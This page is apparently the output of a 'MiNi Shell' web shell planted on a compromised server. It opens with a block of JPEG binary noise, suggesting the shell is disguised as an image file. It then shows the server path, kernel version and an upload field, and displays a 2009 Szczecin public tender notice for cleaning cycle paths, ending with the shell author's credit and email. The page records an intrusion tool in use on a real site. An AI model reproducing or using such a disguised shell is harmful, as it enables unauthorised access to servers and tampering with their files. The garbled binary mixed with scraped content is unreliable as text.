JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090508/139702-N-2009.html

<p class="kh_header"><b>Szczecin: Przedmiotem zamówienia jest oczyszczanie ścieżek rowerowych na terenie miasta Szczecina.</b><br>
<b>Numer ogłoszenia: 139702 - 2009; data zamieszczenia: 08.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 091 4800444,4800434, faks 091 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest oczyszczanie ścieżek rowerowych na terenie miasta Szczecina..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Określenie przedmiotu zamówienia.
Przedmiotem zamówienia jest oczyszczanie ścieżek rowerowych na terenie miasta Szczecina.
Termin realizacji umowy: od dnia podpisania umowy do 31.12.2009 r.
2.	Opis przedmiotu zamówienia.
1)	Przedmiot zamówienia:
Oczyszczanie ścieżek rowerowych na terenie miasta Szczecina.
2)	Zakres zamówienia:
a)	Oczyszczanie 79 360 m2 ścieżek rowerowych z częstotliwością 1 x w miesiącu;
b)	Interwencyjne oczyszczenie ścieżki rowerowej;
3.	Realizacja przedmiotu umowy.
1)	Poprzez oczyszczanie ścieżki rowerowej rozumie się usuwanie piasku i innych zanieczyszczeń z całej powierzchni (z wyjątkiem odchwaszczania).
Zadanie musi być realizowane w maksymalnym stopniu przy zastosowaniu specjalistycznych maszyn czyszczących. Należy jednak przewidzieć konieczność ręcznego oczyszczenia fragmentów ścieżki rowerowej wszędzie tam gdzie użycie samojezdnego sprzętu nie jest możliwe. Jednostką rozliczeniową będzie 1 m2 ścieżki rowerowej.
2)	Oczyszczanie ścieżek rowerowych będzie się odbywało zgodnie z harmonogramem zaakceptowanym przez Zamawiającego.
Wykonawca zobowiązany jest przedstawić harmonogram oczyszczania ścieżek rowerowych w ciągu 14 dni od dnia podpisania umowy.
3)	Oczyszczanie ścieżek rowerowych winno być wykonywane z zachowaniem częstotliwości wskazanych przez Zamawiającego tj.: 1 x w miesiącu;
W okresie zimowym tj. od 1.11.2009 r. do 31.12.2009 r. oczyszczanie będzie się odbywało zgodnie z harmonogramem tylko w dniach bez opadów śniegu i wystąpienia gołoledzi. 
4)	Zamawiający przewiduje prace interwencyjne związane ze sprzątaniem ścieżki rowerowej wg zleceń interwencyjnych wystawianych przez Zamawiającego do wysokości 5 % wartości wynagrodzenia wynikającego z oferty:
a)	Zlecenie interwencyjne to oczyszczenie ścieżki rowerowej, wymagającej oczyszczenia poza harmonogramem, ścieżki nie ujętej w harmonogramie, usunięcie śmieci, odchodów zwierzęcych i innych zanieczyszczeń.
b)	Zlecenia interwencyjne wykonywane będą na podstawie dyspozycji Zamawiającego, określonej odrębnym zleceniem, przekazanym telefonicznie, faxem lub pocztą elektroniczną.
c)	Wykonawca w ofercie cenowej za interwencyjne oczyszczanie ścieżek rowerowych poda cenę za oczyszczenie mechaniczne 1 m2 ścieżki rowerowej (maksymalnie 200% ceny ofertowej).
d)	Termin wykonania zlecenia interwencyjnego nie może przekroczyć 12 godzin od zgłoszenia przez Zamawiającego.
5)	Zamawiający przewiduje, że w trakcie realizacji zamówienia może ulec zmianie wykaz ścieżek rowerowych. Zwiększenie lub zmniejszenie ogólnej powierzchni do oczyszczania może wynieść do  5 % ilości wykazanej w załącznikach. Wprowadzenie do stałego oczyszczania dodatkowych ścieżek rowerowych będzie rozliczane po cenach podanych w ofercie cenowej na oczyszczanie stałe.
6)	Zamawiający zastrzega sobie prawo przeprowadzenia kontroli bez udziału przedstawiciela Wykonawcy.
4.	Wymagania zamawiającego.
1)	Wykonawca ubiegający się o zamówienie musi spełniać następujące warunki:
a)	dysponować minimum 1 zamiatarką chodnikową, max. szerokość zamiatarki 2 m;
b)	dysponować odpowiednim potencjałem ludzkim zapewniającym realizację umowy;
2)	Wykonawca musi utrzymywać łączność ze służbami Zamawiającego w godzinach 6:00 - 22:00 poprzez posiadanie telefonu stacjonarnego, telefonu komórkowego, faxu.
3)	Wykonawca zobowiązany będzie do opracowania i przesłania w formie papierowej i elektronicznej harmonogramu oczyszczania ścieżek rowerowych w ciągu 14 dni od podpisania umowy.
4)	Wykonawca jest w rozumieniu ustawy o odpadach z dnia 27.04.2001 r. (tekst jednolity Dz.U.07.39.251 z późniejszymi zmianami) Wytwórcą odpadów powstających w wyniku świadczenia usług.
5.	Wynagrodzenie za wykonanie przedmiotu zamówienia.
1)	Za wykonanie zadań objętych przedmiotem umowy ustala się wynagrodzenie miesięczne na podstawie ceny ofertowej oraz wystawionej faktury, wynikające z obmiaru ścieżek rowerowych.
2)	Za wykonanie interwencyjnego oczyszczania ścieżek rowerowych tzw. interwencji, ustala się wynagrodzenie brutto, stanowiące iloczyn ceny jednostkowej tj. 1 m2, wskazanej w ofercie cenowej i wielkości powierzchni określonej w zleceniu, jednak łączne wynagrodzenie za interwencje nie może wynosić więcej niż 5 % wartości wynagrodzenia wynikającego z oferty. Dopuszcza się możliwość całkowitego rozliczenia interwencji na przestrzeni trwania umowy. Załącznikiem do faktury będzie zbiorcze zestawienie zleceń interwencyjnych z danego miesiąca rozliczeniowego.
3)	Wprowadzenie do stałego oczyszczania dodatkowych ścieżek rowerowych będzie rozliczane po cenach podanych w ofercie cenowej na oczyszczanie stałe.
4)	Wynagrodzenie płatne będzie jeden raz w miesiącu na podstawie faktury wystawionej przez Wykonawcę do 5-go dnia każdego miesiąca następującego po miesiącu, w którym usługa była wykonana..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.13.00-5, 90.61.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5)	spełniają następujące warunki dodatkowe:
a)	dysponują lub będą dysponować następującym sprzętem:
-	minimum 1 zamiatarką chodnikową o  maksymalnej szerokości 2 m;.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Każdy z wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1)	Oświadczenie wykonawcy, według wzoru, stanowiącego załącznik nr 2 do niniejszej siwz o spełnianiu warunków określonych w art. 22 ust. 1 ustawy,
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik 
w imieniu wykonawców składających ofertę wspólną.
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
3)	Wykaz niezbędnych do wykonania zamówienia maszyn specjalistycznych i środków transportu według wzoru stanowiącego załącznik nr 3 do niniejszej siwz.
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz. Warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.
4)	Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia maszyn specjalistycznych i środków transportu, jeżeli w wykazie, o którym mowa w ppkt 3, wykonawca wskazał maszyny specjalistyczne i środki transportu, którymi będzie dysponował.
5)	Polisa a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 
W przypadku składania oferty wspólnej ww. dokumenty składa każdy z wykonawców składających ofertę wspólną.
6)	Zezwolenie na zbieranie i transport oraz na unieszkodliwianie lub odzysk odpadów komunalnych wydane przez właściwy organ zgodnie z ustawą o odpadach z dnia 27.04.2001r. (tekst jednolity Dz.U.07.39.251 z późniejszymi zmianami). 
W przypadku braku zezwolenia na unieszkodliwianie lub odzysk odpadów komunalnych, wykonawca najpóźniej w dniu podpisania umowy na realizację zamówienia dostarczy umowę zawartą ze specjalistyczną firmą, która posiada zezwolenie na unieszkodliwianie lub odzysk odpadów komunalnych.
W przypadku oferty wspólnej wystarczy, że jeden z Wykonawców  spełni ww. warunek.
2.	Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2 siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące że:
wykonawca podczas realizacji przedmiotu zamówienia postępować będzie w sposób zgodny z zasadami gospodarowania odpadami oraz wymogami ochrony środowiska określonymi w ustawie Prawo Ochrony Środowiska z dn. 27.04.2001 r. (tekst jednolity Dz. U. nr 25  poz. 150 z 2008 r. z późn. zmianami) oraz ustawą o odpadach z dnia 27.04.2001 r. (tekst jednolity Dz. U. nr 39 poz. 251 z 2007 r. z późn. zmianami) z aktami wykonawczymi do ww.
	W przypadku składania oferty wspólnej należy złożyć jeden dokument..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miasto Szczecin
Zarząd Dróg i Transportu Miejskiego w Szczecinie
ul. Klonowica 5, 71 - 241 Szczecin 
pok 305
Wydruk siwz w cenie 10,00 PLN.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2009 godzina 08:30, miejsce: Ofertę należy złożyć w ZDiTM w Sekretariacie Zarządu Dróg i transportu Miejskiego, ul. Klonowica 5, 71-421 Szczecin, piętro III, w terminie do dnia  19.05.2009 r., do godz. 08:30..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com